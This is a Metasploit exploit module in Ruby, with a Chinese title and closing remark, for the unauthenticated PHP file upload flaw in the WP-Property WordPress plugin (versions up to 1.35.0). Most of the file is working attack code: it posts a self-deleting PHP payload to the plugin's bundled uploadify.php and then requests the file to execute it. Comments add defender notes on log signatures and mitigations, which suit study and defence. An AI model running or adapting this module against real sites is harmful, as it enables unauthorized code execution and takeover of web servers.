WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit exploit module for the unauthenticated file upload in the
# WP-Property WordPress plugin (affected versions per the module description:
# <= 1.35.0). It POSTs a PHP file to the plugin's bundled
# third-party/uploadify/uploadify.php and then requests the path the server
# echoes back. No login or nonce is sent at any point.
#
# Defender notes, derived from the requests this module sends:
# - Web logs: a multipart POST to
#   .../wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part whose filename ends in ".php", followed by a
#   GET for a five-letter .php file name.
# - The payload is requested with unlink_self, so (per that option's name)
#   the dropped file is expected to delete itself; rely on request logs, not
#   only on a file-system sweep.
# - Mitigation: remove or block the bundled uploadify.php, move off the
#   affected plugin versions, and deny PHP execution in upload directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE provides get_write_exec_payload, used in #exploit.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets) and the
  # TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'
    }
    super(update_info(info, module_info))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploader script with a plain GET.
  #
  # NOTE(review): a 200 only shows that uploadify.php is reachable; nothing
  # here confirms the plugin version or that an upload would be accepted, so
  # "Appears" is weak evidence and is prone to false positives.
  #
  # @return [Exploit::CheckCode] Unknown on no response or a non-200 status,
  #   Appears otherwise
  def check
    probe = {
      'method' => 'GET',
      'uri'    => "#{wordpress_base_path}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    }
    res = send_request_cgi(probe)
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the PHP payload through uploadify.php, then requests the path
  # returned in the upload response so the server runs it.
  #
  # Fails with UnexpectedReply when the upload gets no response, a non-200
  # status, or a body that does not contain the generated file name.
  def exploit
    uri = wordpress_base_path
    peer = "#{rhost}:#{rport}"
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(unlink_self: true)

    # Two form fields: the file itself and the destination folder, which is
    # the uploadify directory under the WordPress base path.
    form = Rex::MIME::Message.new
    form.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    form.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drop the CRLF in front of a boundary that starts a line.
    post_data = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    upload_request = {
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{form.bound}",
      'data'   => post_data
    }
    res = send_request_cgi(upload_request)

    accepted = res && res.code == 200 && res.body =~ /#{@payload_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") unless accepted

    # The response body is used verbatim as the URI of the uploaded file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Returns TARGETURI's path with a trailing slash appended when missing.
  # The append is done in place on the string returned by target_uri.path.
  def wordpress_base_path
    base = target_uri.path
    base << '/' unless base.end_with?('/')
    base
  end
end

不要问我这写的是什么 怎么利用 我是说msf.